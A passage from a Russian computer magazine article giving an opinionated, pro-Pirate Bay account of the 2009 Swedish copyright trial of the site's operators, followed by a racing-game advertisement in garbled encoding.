на закрытие. 

НА АБОРДАЖ! Ответный удар по TPB 

индустрия развлечений нанесла 31 декабря 

2008, очевидно, решив для полноты эффекта 

испортить всем праздник. Вспомнив старый 

добрый принцип «против кого дружить 

будем?», компании Warner Bros., MGM Pictures, 

Columbia Pictures, 20th Century Fox и Sony BMG 

подали коллективный гражданский иск против 

Свартхольма, Нейджа, Сунде и Лундстерма. 

Нота протеста сильных мира сего шла рука об 

руку с очередным иском «местного значения» 

— шведские власти снова взялись за трекер, 

обвинив уже упомянутых лиц в содействии 

нарушению закона об авторском праве, 

грозящим им тюремным заключением до двух 

лет и штрафом в размере до $188.000. Может 

быть, все это звучало бы внушительно, если бы 

Голливуд в свою очередь не требовал компенсации 

порядка 14 миллионов долларов. 

После объявления этой новости в Сети сразу же 

возник большой резонанс. Практически всем 

было ясно, что судить будут не столько этих 

четырех человек, сколько некое абстрактное 

«сетевое пиратство», и итог процесса может 

иметь далеко идущие последствия. 

Команда The Pirate Bay, однако, унывать не спешила. 

Вместо этого они собрали пресс-конференцию, 

в ходе которой много шутили и открыто 

называли грядущее разбирательство «шоу и 

фарсом». К тому же, ребята окрестили процесс 

метким словечком «Spectrial» (производным 

от «spectacle trial» — суда-спектакля). По этому 

тэгу очень удобно искать в Сети информацию о 

ходе слушания :). 

Миллионные компенсации админов тоже не 

испугали. В частности, Питер Сунде заявил: 

«Неважно, сколько они потребуют — несколько 

миллионов или миллиардов. Мы не богачи и 

у нас нет денег, чтобы платить. Они не получат 

ни цента». Готтфрид Свартхольм его полностью 

поддержал: «У меня в Швеции и так столько 

долгов, что мне никогда их не выплатить. Я даже 

здесь не живу. Пусть присылают мне счет — я 

повешу его в рамочку на стену». В ходе общения 

с прессой было особенно подчеркнуто, что на 

этот раз иск выдвинут не против сайта в целом, а 

против четырех конкретных личностей, и обвинение 

явно собирается сфокусироваться на них. 

В пример привели тот факт, что Готтфрида на 

допросе сначала попросили рассказать о своих 

политических и идеологических взглядах, а 

вовсе не о его участии в деятельности TPB. 

073

сцена 

ПЕРВЫЙ РАУНД: ДЕЛО О ПОД- 

МОЧЕННОЙ РЕПУТАЦИИ На слушание, 

начавшееся 16-го февраля этого года, 

подсудимые, не изменяя себе, прибыли на 

безумном красном автобусе, от кабины до 

заднего бампера изрисованном граффити с 

логотипами сайта и надписями вроде: «All your 

base are belong to bus». Впоследствии автобус 

исполнял роль штаб-квартиры, пресс-центра 

и комнаты отдыха. На улице «героев» уже 

поджидали активисты с пиратскими флагами, а 

само заседание вызвало такой интерес, что на 

него даже продавали билеты, стоимостью около 

$60. Ряду особенно ярых сторонников трекера 

таким путем удалось попасть в здание суда, где 

они получили возможность слушать прямую 

аудио-трансляцию в специально отведенной 

для этого комнате. 

Впрочем, следить за ходом событий мог и весь 

прогрессивный мир. На twitter.com создали тэг 

#spectrial, по которому легко отслеживались 

все нужные записи, на самом TPB появился 

мира. Обвинение с первого же дня постаралось 

представить все так, будто держатели сайта не 

только преступают закон, но и зарабатывают на 

своем детище солидные деньги, в частности, 

размещая на сайте рекламу. The Pirate Bay 

назвали «состоятельной организованной преступной 

группой», которая извлекала из своей 

деятельности весомый доход. 

Так, представитель интересов IFPI 

(международная федерация грамзаписи) 

Питер Дановски заявил, что обвиняемые в 

состоянии покрыть большую часть суммы, 

заявленной в иске. Питер Сунде ехидно 

прокомментировал этот пассаж в Твиттере: 

с команды The Pirate Bay сняли, потому что 

обвинение не сумело доказать, что представленные 

в качестве улик .torrent-файлы 

использовались на TPB. Обвинитель даже не 

смог объяснить, как работает уже упомянутая 

технология DHT, позволяющая раздавать 

и качать файлы в обход трекера. Таким 

образом, пункт о «пособничестве в нарушении 

авторских прав» пришлось вычеркнуть, 

оставив только «пособничество в предоставлении 

доступа». В IFPI, однако, попытались 

сохранить лицо и сделать вид, что «так надо». 

Спешно было выпущено заявление, где 

говорилось, что все эти технические вопросы 

только усложняли работу обвинения, к делу 

относились лишь косвенно, и вообще, — без 

них будет даже проще сосредоточить все 

внимание на основной проблеме — предоставлении 

доступа к защищенным копирайтом 

материалам. Почему-то заявлению никто 

не поверил, а весь интернет покатывался со 

смеху, полностью разделяя позицию Сунде, 

Чтобы поддержать TPB, шведы снова вышли на улицы 

Роджер Уоллис и его супруга 

раздел trial.thepiratebay.org, куда стекались 

самые последние новости, плюс заседание широко 

освещалось прессой и блогерами во всех 

возможных форматах. Аудиостримминг из зала 

суда переводился добровольцами на 15 языков 

«Если я действительно заработал всю исковую 

сумму, то меня, видимо, кто-то ограбил». 

Однако все эти громкие заявления изрядно 

портил тот факт, что обвинение с самого начала 

стало демонстрировать полную безграмотность 

в технических вопросах. Эксперты, путающие 

мегабиты с мегабайтами, дискеты с дисками и 

не могущие объяснить, как работает технология 

DHT, вряд ли имеют право называться 

«экспертами». И уже на второй день слушаний 

это действительно вышло им боком. 

Семнадцатое февраля принесло миру удивительную 

новость — половину обвинений 

который на этот раз отписал в Твиттере: «EPIC 

WINNING LOL». 

IFPI продолжила гнуть свое, заявив, что одна 

загрузка равняется одной потерянной продаже, 

а сумма, заявленная в иске, примерно 

КТО ЗАДЕЙСТВОВАН В МАССОВКЕ? 

Всего в иске фигурируют 4 программы, 

9 фильмов и 22 музыкальных 

произведения. 

Иск против The Pirate Bay поддержан 

следующими свидетелями 

обвинения: 

IFPI (международная федерация 

грамзаписи): 

• Sony BMG Music Entertainment 

Sweden AB, 

• Universal Music AB, 

• Playground Music Scandinavia AB, 

• Bonnier Amigo Music Group AB, 

• EMI Music Sweden AB, 

• Warner Bros. Music Sweden AB; 

Antipiratbyran (Антипиратское 

бюро Швеции): 

• Yellow Bird Films AB, 

• Nordisk Film, 

• Henrik Danstrup; 

MAQS Law Firm Advokatbyra KB: 

• Warner Bros. Entertainment Inc, 

• MGM Pictures Inc, 

• Columbia Pictures Industries Inc, 

• 20th Century Fox Films Co, 

• Mars Media Beteiligungs GmbH & 

Co Filmproduktions, 

• Blizzard Entertainment Inc, 

• Sierra Entertainment Inc, 

• Activision Publishing Inc. 

Фильмы, фигурирующие в иске: 

• Kurt Wallander: 

Wallander — Den svaga punkten 

Wallander — Afrikanen 

Wallander – Mastermind 

• Pusher III 

• Гарри Поттер и кубок огня 

• Розовая пантера 

• Переступить черту 

Телесериалы, фигурирующие в 

иске: 

• Prison Break (первый сезон, 

эпизоды 1—13) 

Компьютерные игры, фигурирующие 

в иске: 

• Call of Duty 2 

• Diablo II 

• F.E.A.R. 

• World of Warcraft 

074 

XÀÊÅÐ 04 /124/ 09

сцена 

равна стоимости всех лицензий, которые понадобились бы TPB для 

легального распространения музыки. Трекер, по сути, предложили 

приравнять к организациям, на которые распространяется «лицензия 

на глобальную дистрибуцию» (global distribution license). 

Согласно этому, IFPI, например, требует за песню Beatles «Let it Be» 

возмещения ущерба в десятикратном размере, так как музыку этой 

группы легально скачать из Сети невозможно. Последнее вызвало 

особенно много насмешек и комментариев в духе: «Вы же сами 

заставляете нас воровать». 

Особенно забавно, что в тот же день компания Sony и Антипиратское бюро 

Швеции (Svenska Antipiratbyran) отметили хамство, демонстрируемое TPB 

в общении с правообладателями. Они завели речь не только о материальных 

убытках, но и об ущербе, нанесенном их репутации. Был ущерб или 

нет — решать, разумеется, суду, но определенно, пора бы им намекнуть, 

что ущерб собственной репутации наносят разве что они сами, например, 

демонстрируя всему миру свою техническую безграмотность. 

ЗАЩИТА КИНГ-КОНГА Весьма сомнительным «достижением» 

обвинения стало и выступление адвоката от киноиндустрии Моники 

Вадстед (Monique Wadsted). Эта дама является активным членом секты 

Рона Хаббарда — «Церковь сайентологии» и часто представляет ее в 

суде. Упустить такой повод было никак нельзя, и на главной странице 

TPB появилась картинка, на которой Том Круз (тоже ярый сайентолог) и 

мисс Вадстед стоят в обнимку с гуманоидом Ксену (Xenu) — инопланетным 

властелином «Галактической Империи». Дело в том, Рон Хаббард 

был еще и фантастом. Согласно вере сайентологов и тому, что Хаббард 

описал в формате космооперы — 75 миллионов лет назад Ксену был 

военным диктатором и руководил «Галактической Империей». Подавляя 

проявления инакомыслия среди своего народа, он спровоцировал 

массовые протесты и, не долго думая, арестовал всех, кто принимал в 

них участие. Проштрафившихся привезли на планету Тиджиек, то есть, 

на Землю и по прибытии разметили вокруг вулканов. После этого Ксену 

«покарал» неверных водородными бомбами, собрал их души и внедрил 

в тела людей. 

Да, сайентологи на самом деле в это верят и еще запрещают нам ковыряться 

в носу, то есть, качать файлы. Кстати, отдельного упоминания 

достойно и то, что на главной странице трекера Ксену предстал в том 

же образе, каким его нарисовали создатели сериала South Park. А из 

фамилии Моники пропала буква «D» (получившееся слово «wasted» 

переводится как «напрасная трата»). 

Как выяснилось позже, поклонниками «Южного парка» оказались не 

только подсудимые, но и, по крайней мере, один из их адвокатов. Получив 

от суда слово, защита проводила аналогии с Google, утверждая, 

что .torrent-файлы не принадлежат TPB, а трекер просто исполняет 

роль поисковика. К тому же, в ЕС провайдер не несет ответственности 

за передаваемый контент, если сам не является инициатором 

раздачи. И когда очередь дошла до адвоката Лундстрема — Пера 

Самуэльсона, он сделал то, что тут же получило название «защита 

Кинг-конга». Это — прямая отсылка к «Южному парку», где в одном из 

эпизодов демонстрировалась «защита Чубакки». Суть этой стратегии 

можно охарактеризовать, как «кто-то доказывает свою точку зрения с 

помощью утверждений настолько абсурдных, что сознание слушателя 

отключается» (с) Эллис Уинер. В South park адвокат показывал 

присяжным изображение Чубакки и спрашивал, почему большой, 

двухметровый вуки Чубакка живет на Эндоре вместе с маленькими 

эвоками? Потом адвокат говорил, что — во время суда по делу об 

авторском праве он завел разговор о Чубакке, а в этом нет никакого 

смысла. А значит, и в самом деле нет никакого смысла, и, раз Чубакка 

живет на Эндоре, подсудимого надо оправдать. 

Самуэльсон же сказал следующее: «Инструкция ЕС 2000/31/EG 

гласит, что провайдер информационных услуг не несет ответственности 

за передаваемые данные. Ответственность наступает лишь 

в случае, если провайдер сам инициирует передачу, но администраторы 

The Pirate Bay этого не делали. Это делали пользователи 

— живые люди, которых можно идентифицировать. Они называют 

себя именами вроде Кинг-Конг. ...Согласно букве закона, обвинения 

должны быть направлены против конкретного человека, а 

Антипиратская демонстрация, 2006 год 

XÀÊÅÐ 04 /124/ 09 

Адвокаты защиты. Слева направо: Питер Алсин, Йонас Нилльсон, Ола 

Соломонссон 

между преступником и соучастниками должна прослеживаться 

очевидная связь. Такой связи представлено не было. Прокурор 

должен доказать, что Карл Лундстрем лично общался с пользователем 

Кинг-Конгом, который вполне может находиться, например, 

где-нибудь в джунглях Камбоджи». 

Далее суд, наконец, добрался до самих обвиняемых, и начались 

допросы, в ходе которых Лундстрема пытались представить хозяином 

и спонсором TPB, ведь он даже оплачивал из своего кармана оборудование 

для «Бухты». Лундстрем парировал, сказав, что в будущем 

действительно планировал покрыть эти убытки, размещая рекламу на 

сайте, но никогда не стремился стать полноправным партнером ребят по 

проекту и уж точно — не участвовал в деятельности TPB из политических 

соображений. Более того, защита еще раз подчеркнула, что, с точки 

зрения шведского законодательства, деятельность трекера абсолютно 

легальна, так как на серверах TPB не хранится файлов, нарушающих 

чьи-либо права на интеллектуальную собственность. А значит, Лундстрем 

действовал как обычный бизнесмен, не больше и не меньше. 

В отношении троих админов — обвинение пыталось расставить точки 

на i и выяснить, какую роль в жизни сайта играет каждый из них. Плюс, 

их старались подловить, выпытывая, знали ли они, что через их ресурс 

проходит огромное количество нелегальных материалов, и, если да, то 

почему ничего в этой связи не предпринимали. Защита ответствовала, 

что из 1000 случайных торрентов, взятых с TPB, 80% не нарушали копи- 

075

сцена 

райтов, и снова посоветовала обвинению обратить внимание на Google, 

при помощи которого можно найти гораздо больше контрафакта, или 

на YouTube, где нелегален едва ли не каждый второй ролик. Сделали и 

акцент и на том, что для обмена .torrent-файлами нет необходимости 

пользоваться The Pirate Bay, ведь с тем же успехом .torrent-файл можно 

выложить на FTP или прислать по электронной почте. 

Так же обвинение затронуло серьезный вопрос о детской порнографии, 

уже ставший любимым пугалом нашего времени. Админы честно 

ответили, что обо всех обнаруженных раздачах такого рода сообщают в 

полицию. Обвинение попыталось настаивать и уточнило — удаляются 

ли такие раздачи с ресурса? Готтфрид ответил: «Некоторые», и тут же 

был вынужден пояснить, что самостоятельно расследованием таких 

случаев администрация TPB заниматься не может, поэтому передает 

данные полиции, и если полиция, в свою очередь, просит удалить 

торрент, то он удаляется. 

Вообще, обвинение опять демонстрировало себя не с самой 

выгодной стороны. Например, несколько раз обвинители попытались 

приобщить к делу не заявленные ранее улики, нарушая 

протокол. В итоге, суд вообще был вынужден сделать выговор 

адвокатам со стороны обвинения и попросить их перестать 

вести себя, как в американском суде. Так, мисс Вадстед до этого 

попыталась просто перекричать судью, а представляющий IFPI 

Питер Дановски порывался упирать на политическую подоплеку 

происходящего. Он цитировал некоторые записи Питера Сунде, 

сделанные им в личном блоге Brokep.com, и задавал вопросы 

относительно его доклада, который носил характерное название: 

«Как разоружить миллиардную индустрию». 

Черту под первой неделей слушаний подвела, опять же, мисс Вадстед, 

поинтересовавшаяся у Карла Лундстрема, почему он, солидный бизнесмен 

48 лет, вообще общается с молодыми ребятами из команды TPB? 

Адвокат Лундстрема заявил, что его клиент не станет отвечать на этот 

вопрос, после чего в заседании был объявлен перерыв. 

ВТОРОЙ РАУНД: ДЕНЬГИ VS ЛОГИКА Вторая неделя не 

принесла кардинальных перемен в стратегиях сторон. Обвинение 

по-прежнему заставляло весь мир недоуменно вопрошать: «Они это 

серьезно?», а защита держалась уверенно и ровно. Открыли слушания 

показания двух свидетелей со стороны обвинения: Магнуса Мартенссона 

(Magnus Martensson) — юриста из IFPI, который уже 15 лет специализируется 

на нарушении авторских прав, и Андерса Нильссона (Anders 

Nilsson) — полицейского из Антипиратского бюро. Оба, по заданию 

«сверху», в целях эксперимента, скачивали нелегальные материалы 

с TPB, о чем и поведали суду, предоставив в качестве доказательств... 

скриншоты. Обвинение в очередной раз село в лужу, и помог ему Готтфрид 

Свартхольм. Он задал свидетелю один простой вопрос, спровоцировав 

нижеследующий диалог. 

Готтфрид: Перед тем, как сделать скриншот, вы отключили DHT и Peer 

Exchange? 

Мартенссон: DHT явно был включен. Я же хотел походить на обычного 

пользователя. 

Готтфрид: Говоря другими словами, вы не могли проверить, использовался 

ли трекер? 

Мартенссон: Адрес трекера присутствовал на экране. Исходя из этого, я 

предположил, что он каким-то образом используется. 

Готтфрид: Но, раз у вас был включен DHT, значит, вы не можете доказать, 

что использовали при скачивании файлов трекер The Pirate Bay или нет? 

Мартенссон: Нет. 

Со вторым свидетелем все повторилось, — он тоже не смог представить 

нормальных доказательств, что «Пиратская бухта» участвовала в процессе 

скачивания файлов. Выяснилось, что никаких логов у обвинения 

нет, закачка нелегального контента никак не протоколировалась, не считая 

упомянутых картинок. Защита, довольная результатом, не преминула 

подчеркнуть, что TPB не является начальной точкой распространения 

контрафактной продукции, и все упомянутые материалы можно было 

скачать из Сети и ранее. 

Настоящим «звездным днем» процесса стало 25-е февраля. В этот 

Моника Вадстед без Тома Круза и Ксену 

день показания давали сильные мира сего лично. В суд явились: Джон 

Кеннеди (John Kennedy), генеральный директор IFPI; Пер Сундин (Per 

Sundin), генеральный директор Universal Music; Бертил Санндгрен 

(Bertil Sandgren), один из директоров «Шведского института кинематографии» 

(Svenska Filminstitutet) и Людвиг Вернер (Ludwig Werner) из 

шведского представительства IFPI. 

Говорили они на удивление однообразно, по одинаковой схеме. Сначала 

в красках описывали, какие чудовищные убытки наносит им файлообмен, 

как из-за этого страдают продажи, хотя интерес к музыке, напротив, 

растет, и так далее. Суть речей сводилась к одному: «как же нам надоели 

ваши интернеты, вот бы их все взять и закрыть». Но как только упомянутым 

господам начинали задавать вопросы по существу и просили 

хотя бы обрисовать механизм работы торрента, можно было видеть уже 

привычную картину — полное непонимание и бессвязные отговорки. 

Вменяемого ответа на вопрос, как можно обвинять в чем-то The Pirate 

Bay, не понимая даже базовых принципов его работы, тоже добиться, не 

удалось. Магнаты вместо этого апеллировали «фактами» в духе: «я знаю, 

что через thepiratebay.org нелегально распространяют музыку» (откуда 

взялось это знание — загадка), или: «50% убытков медиа-корпорации 

несут из-за деятельности thepiratebay.org». По поводу последнего Сунде 

прокомментировал в Твиттере: «Шикарно, теперь осталось только доказать 

влияние пиратов на климат». 

Почему обвинение с таким небрежением отнеслось к подготовке и продолжало 

допускать настолько глупые промахи, решительно непонятно. 

Со стороны все это походило на фарс или комедию абсурда. В итоге, первого 

грамотного специалиста (не считая, конечно, самих обвиняемых) 

суду удалось увидеть только на 9-й день разбирательства. И, разумеется, 

им стал свидетель защиты. 

Хотя правильнее будет сказать, что первого вменяемого специалиста суд 

не увидел, а услышал — с Кристофером Шоллином (Kristoffer Schollin), 

доктором философии из Университета Гетеборга, связались по телефону. 

Разговор продолжался почти два часа, и Шоллин успел популярно 

рассказать и о работе технологии BitTorrent, и о том, что сами по себе 

торрент-клиенты и трекеры безвредны и даже удобны, недаром ими 

пользуются такие огромные корпорации, как Intel или Blizzard. Также 

Кристофер поделился мыслью, что трекеры, по сути, исполняющие 

сейчас роль поисковиков торрентов, вскоре исчезнут вовсе. Поиск будет 

производиться прямо из клиентской программы, или же через Google, 

который на текущий момент прекрасно справляется с этой задачей. 

ЦВЕТОЧНАЯ БУРЯ После Кристофера Шоллина слово перешло 

ко второму свидетелю защиты, совершенно потрясающему человеку и 

настоящему герою процесса — Роджеру Уоллису (Roger Wallis), профессору 

Королевского технологического института. Роджеру сейчас 68 лет и 40 из 

076 

XÀÊÅÐ 04 /124/ 09

сцена 

знали, что на следующий день после визита в суд профессор Уоллис и 

его жена Йорель как раз собирались отметить 39-ю годовщину своей 

свадьбы. Когда это открылось, поток флоры хлынул с удвоенной силой :). 

К вечеру праздничного дня чета получила цветов на сумму почти 6.000 

евро. Смеясь, они советовали активистам начинать слать вазы, потому 

что вся тара в доме уже закончилась. 

Карл Лундстрем 

«КАК ЖЕ НАМ НАДОЕЛИ ВАШИ 

ИНТЕРНЕТЫ, ВОТ БЫ ИХ ВСЕ 

ВЗЯТЬ И ЗАКРЫТЬ». 

них он потратил на исследования в сфере новых технологий. Он является 

автором ряда книг и исследований, а также входит в совет правительства 

по вопросам IT. Помимо перечисленного, Уоллис успел стать композитором, 

автором песни, с которой Швеция выступала в 1969 на Евровидение, и 

основателем рекорд-компании. 

Его взвешенные, подкрепленные цифрами и знанием темы аргументы 

настолько взбудоражили обвинителей, что допрос они вели в откровенно 

хамской манере. Роджер сказал, что никогда не слышал об исследованиях, 

согласно которым запрет файлообмена мог бы привести к росту продаж 

CD-дисков. Он заметил, что продажи падают отнюдь не только из-за пиратов, 

но и потому что устаревают сами носители информации. Прогресс — чудовищная 

сила, люди переходят на mp3-плееры, потому что это удобно, и они 

предпочитают качать файлы из Сети, потому что это тоже удобно и быстро. 

Уоллис даже осмелился заговорить о пользе файлообмена. Он сослался на 

свои исследования 3-летней давности, которые однозначно свидетельствуют 

— люди, качающие файлы из Сети, покупают больше других и гораздо 

чаще посещают концерты. То есть, денежные потоки никуда не исчезли, они 

просто сменили русло, и теперь деньги идут в обход длинной цепочки продюсеров, 

рекорд-компаний и иже с ними (к огромному неудовольствию последних). 

Роджер не оставил без внимания и тот факт, что в Швеции существует 

специальный налог на каждый проданный mp3-плеер или «болванку», благодаря 

которому правообладатели все равно получают свое, сколько бы они 

ни пытались доказать обратное. В ответ на это обвинение не нашло ничего 

лучше, как попытаться поставить под сомнение степень профессора и 

засыпать его оскорбительными вопросами личного характера. Обвинители 

вели себя настолько некорректно, что судья даже посоветовал Уоллису 

подать в суд на представителя «Антипиратского бюро» Хенрика Понтена, и 

поинтересовался, не желает ли Роджер получить какую-то компенсацию. 

В ответ Уоллис пошутил, сказав: «Пошлите моей жене цветы». 

Вряд ли Роджер предполагал, что с тысячи людей по всему миру, пристально 

следящие за ходом процесса в онлайне, воспримут его шутку 

как сигнал к действию и моментально организуют спецоперацию-флешмоб 

под названием flowerstorm — «цветочная буря». Волна позитива, 

воплотившегося в цветочных букетах, буквально захлестнула пожилую 

пару — цветы начали приносить уже спустя пару часов после оброненной 

Уоллисом фразы. Интернет готов был носить его на руках, после 

настолько смелого и сильного выступления. И вряд ли флешмоберы 

XÀÊÅÐ 04 /124/ 09 

FINITA LA COMEDIA После светлого эпизода с «цветочной бурей» 

наступила черная полоса. Допросив Уоллиса, обвинители переключились 

на Готтфрида и Фредрика. Теперь речь шла не о TPB — просто на этих двоих 

обвинению удалось раскопать компромат. У Готтфрида еще при рейде в 

2006 году нашли марихуану и амфетамины, а Нейж якобы успел поучаствовать 

в краже со взломом в 2002. Дело Фредерика на сегодня уже закрыто, 

да и ничего серьезного там, судя по всему, не было — в нетрезвом виде 

выломали дверь у какого-то знакомого и зачем-то унесли его компьютер, 

который потом и обнаружился у Нейжа. У Готтфрида все выглядит серьезнее, 

так как это уже «хранение наркотиков», но Свартхольм, разумеется, 

все отрицает, ссылаясь на гостей, которые часто у него останавливаются. 

Последующие два дня обвинение и защита поочередно подводили 

итоги, обращаясь к суду с финальными речами. Ничего нового, в общемто, 

не прозвучало. Обвинение, сгущая краски, живописало мистические 

миллионные доходы команды TPB и вещало о «вреде интернетов» и 

файлообмена, требуя посадить обвиняемых хотя бы на год. Не преминули 

представители Голливуда и снова пройтись по Роджеру Уоллису, 

теперь уже за глаза облив профессора грязью. Защита, в свою очередь, 

указала на чудовищные дыры в стратегии обвинителей, еще раз 

популярно объяснив, что на серверах «Пиратской бухты» нет никакого 

контрафакта и напомнив о Шведском законодательстве, согласно 

которому трекер — чист. Говорили защитники и о прогрессе, и о том, что 

нельзя отказываться от новых технологий лишь потому, что какой-то 

процент населения может использовать их в преступных целях. Было 

замечено, что четверке так и не предъявили никаких личных обвинений, 

и осталось совершенно неясно, кто и что именно нарушал. Более того, 

адвокат Питера Сунде — Питер Алсин — заявил, что сделает все, чтобы 

восстановить репутацию Роджера Уоллиса, чьи данные, по его мнению, 

были достовернее отчетов IFPI. 

Суд сообщил, что огласит вердикт 17-го апреля в 13:00 по московскому 

времени, и заседание закрылось. 

Каково будет решение суда — неизвестно, но у ребят есть все шансы выиграть 

это дело, создав совершенно уникальный прецедент, на который 

потом будут опираться по всему миру. 

Правы ли они, и так ли уж беспочвенны выдвинутые против них 

обвинения? В конце концов, на TPB действительно есть реклама, 

приносящая администрации сайта определенный доход (пусть и не 

те золотые горы, о которых шла речь), а через трекер действительно 

проходит прорва контрафакта. На эти вопросы очень сложно ответить, 

потому что они затрагивают всю сложившуюся систему защиты 

авторских прав и прав на интеллектуальную собственность в целом. 

Сложно поспорить с тем, что система действительно устарела, а 

законы в США чудовищны. Сложно не видеть, что медиа-холдинги 

США тесно связаны с политикой и стремятся расширить свое влияние 

на Европу, повернув тамошнюю ситуацию аналогичным образом. 

Голливуд и компания сейчас активно сражаются с ветряными мельницами 

прогресса, демонстрируя при этом как откровенное неуважение 

к конечным пользователям собственной продукции, так и полную 

техническую безграмотность. Просто почитав сводки о процессе 

по делу TPB, задумываешься, — и почему я должен платить ЭТИМ 

людям? Не авторам музыки, не актерам и не режиссерам фильмов, а 

вот этим безграмотным хамам, которые стоят у руля индустрии и не 

желают сдавать позиций. Конечно, призывать к повальной халяве и 

анархии в Сети тоже глупо. Хочется верить, что The Pirate Bay сможет 

создать прецедент, который со временем позволит изменить существующую 

драконовскую систему и поможет информационному обмену 

стать свободнее. И, пожалуй, не столь уж важно, сколько админы TPB 

заработали на рекламе — их вклад в «освобождение информации» в 

любом случае сложно переоценить. z 

077

Ðåêëàìà 

MAXI Racing

Ñïîíñîðû ðóáðèêè 

Æóðíàë MAXI tuning ñîâìåñòíî 

ñ îäíèì èç ëèäåðîâ Car Audio & 

Mobile Media – êîìïàíèåé Alpine, 

à òàêæå Opel, ðàçâëåêàòåëüíûì 

ïîðòàëîì MSN.ru è ñòðàõîâûì ïàðòíåðîì ÐÎÑÍÎ 

ïðåäñòàâëÿþò ñàìûé óâëåêàòåëüíûé ïðîåêò ãîäà. 

Èãðà MAXI Racing – ýòî âèðòóàëüíûé ñèìóëÿòîð 

ãîíîê íà 402 ìåòðà. Ýòî ïüÿíÿùàÿ ñìåñü àçàðòà, 

ðèñêà, ñêîðîñòè è áåñêîíå÷íîãî òþíèíãà. Ïðèøëî 

âðåìÿ MAXI Racing! 

Äëÿ òîãî ÷òîáû ïîïàñòü â ýòîò èãðîâîé ìèð òåáå 

íåîáõîäèìû ëèøü Èíòåðíåò è íåìíîãî ñâîáîäíîãî 

âðåìåíè. Ïåðåä òåì, êàê îùóòèòü âêóñ ïîáåä, 

ñìåëîñòü ïðîòèâíèêîâ è ðàçìåð âûèãðûøà, òåáå 

íåîáõîäèìî ëèøü ïðîéòè íåñëîæíóþ ðåãèñòðàöèþ 

íà ñàéòå èãðû, óêàçàâ ñâîè ïåðñîíàëüíûå äàííûå. 

Çàòåì â òâîåì ðàñïîðÿæåíèè îêàçûâàþòñÿ ïðîñòîðíûé 

ãàðàæ è íåáîëüøîé ïåðâîíà÷àëüíûé êàïèòàë, 

êîòîðûé äàñò òåáå âîçìîæíîñòü ïðèîáðåñòè àâòîìîáèëü! 

Â âèðòóàëüíîì àâòîìàãàçèíå (à èìåííî 

òóäà òû è äîëæåí îòïðàâèòüñÿ) äëÿ òåáÿ ñìîäåëèðîâàíû 

âñå ïðåäñòàâèòåëè «çàðÿæåííîé» ñåðèè 

OPC îò Opel! Òàì æå òû ìîæåøü îçíàêîìèòüñÿ ñ 

òåõíè÷åñêèìè õàðàêòåðèñòèêàìè êàæäîé èç íèõ. 

Ýòè àâòî äåéñòâèòåëüíî î÷åíü õîðîøè â äåëå! Íî, 

ïðè âñåì áîãàòñòâå âûáîðà êóïèòü ñàìûé äîðîãîé 

è ìîùíûé âàðèàíò âðîäå Opel Vectra OPC èëè 

Zafira OPC òåáå ñðàçó íå óäàñòñÿ. Ïîýòîìó íà÷èíàòü, 

ñêîðåå âñåãî, ïðèäåòñÿ ñ ìàëûøà Opel Corsà. 

Ïîñëå ïðèîáðåòåíèÿ àâòî íàñòàåò ñàìîå âàæíîå 

äëÿ òåáÿ äåéñòâî – òþíèíã. Âñå äåòàëè â èãðå 

ïîäåëåíû íå òîëüêî ïî îáëàñòè ïðèìåíåíèÿ, 

íî è ïî ñòåïåíè êðóòèçíû è âàæíîñòè. Äëÿ òîãî 

÷òîáû ïðèîáðåñòè ïîíðàâèâøèéñÿ òþíèíãîâûé 

êîìïîíåíò, íåîáõîäèìî âñåãî ëèøü êëèêíóòü ïî 

íåìó ìûøêîé â îêíå ìàãàçèíà çàï÷àñòåé, è îí 

àâòîìàòè÷åñêè áóäåò óñòàíîâëåí íà òâîé àâòîìîáèëü. 

Âñå î÷åíü ïðîñòî! Ðàçóìååòñÿ, âûáîð áóäåò 

îãðàíè÷åí ñòàðòîâîé ñóììîé, êîòîðàÿ íå ïîçâîëèò 

òåáå âíåäðèòü âñå ñàìîå êðóòîå. Ïîýòîìó âûáèðàé 

ãðàìîòíî. Â ïðîöåññå òþíèíãà íå îáõîäè ñòîðîíîé 

ôèðìåííûé ìàãàçèí Alpine, ñìîäåëèðîâàííûé â 

èãðå! Ñïåöèàëüíî ðàçðàáîòàííûå ìóëüòèìåäèéíûå 

ñèñòåìû, êîòîðûå òåáå ïðåäëîæàò óñòàíîâèòü â 

àâòîìîáèëü, ïîìîãóò ïðèáëèçèòüñÿ ê æåëàåìîé 

ïîáåäå â ãîíêå. Äëÿ êàæäîé ìîäåëè àâòîìîáèëÿ 

ñóùåñòâóåò ñâîé âàðèàíò èíñòàëëÿöèè: ÷òîáû ïîðàäîâàòü 

òåáÿ ñóìàñøåäøèì çâóêîì è âïå÷àòëÿþùèì 

âèäåî, ñïåöèàëèñòû Alpine ïîñòàðàëèñü íà ñëàâó. 

Â çàâèñèìîñòè îò óðîâíÿ ñèñòåìû – «Ëþáèòåëü», 

«Ìàñòåð» èëè «Ýêñïåðò» – âîçðàñòàåò óðîâåíü 

àäðåíàëèíà, à, ñëåäîâàòåëüíî, è òâîé àçàðò è âåçó- 

÷åñòü â ãîíêå. Êîíå÷íî æå, ÷åì êðó÷å ñèñòåìà, òåì 

îíà äîðîæå, íî âåäü çà ïîáåäó â çàåçäå íå æàëêî 

íèêàêèõ äåíåã. Êðîìå òîãî, êàæäûé ìåñÿö ó òåáÿ 

áóäåò âîçìîæíîñòü ïîó÷àñòâîâàòü â ñïîíñîðñêèõ 

«Ñóïåðêóáêàõ Alpine»! Òîëüêî â äíè ïðîâåäåíèÿ 

êóáêà â «Ìàãàçèíå Alpine» òåáå îòêðîåòñÿ ñåêðåòíûé 

ðàçäåë ñ ñóïåðêîìïëåêòîì AlpineF#1Status. 

Ýòà âåùü åùå áîëüøå óâåëè÷èò òâîè øàíñû íà 

ïîáåäó – äî äåñÿòè ðàç! 

Êðîìå òîãî, îäèí èç ëèäåðîâ ðîññèéñêîãî ðûíêà 

ñòðàõîâàíèÿ, êîìïàíèÿ ÐÎÑÍÎ ïðåäîñòàâëÿåò 

òåáå øàíñ âûèãðàòü ñåðòèôèêàò, ïîçâîëÿþùèé ïîëó÷èòü 

ñêèäêó äî 50 000 ðóáëåé íà ïðèîáðåòåíèå 

ïîëèñà ÊÀÑÊÎ! Äëÿ ýòîãî íåîáõîäèìî âñåãî ëèøü 

çàðåãèñòðèðîâàòüñÿ â ñïåöèàëüíîì îêîøêå «Âûèãðàé 

ñòðàõîâîé ñåðòèôèêàò ÐÎÑÍÎ» â âèðòóàëüíîì 

àâòîìàãàçèíå. 

Âñå ÿñíî? Òîãäà èäåì äàëüøå. Äëÿ òîãî ÷òîáû ïðåòåíäîâàòü 

íà ñàìîå ëó÷øåå è äîðîãîå, òåáå íóæíû 

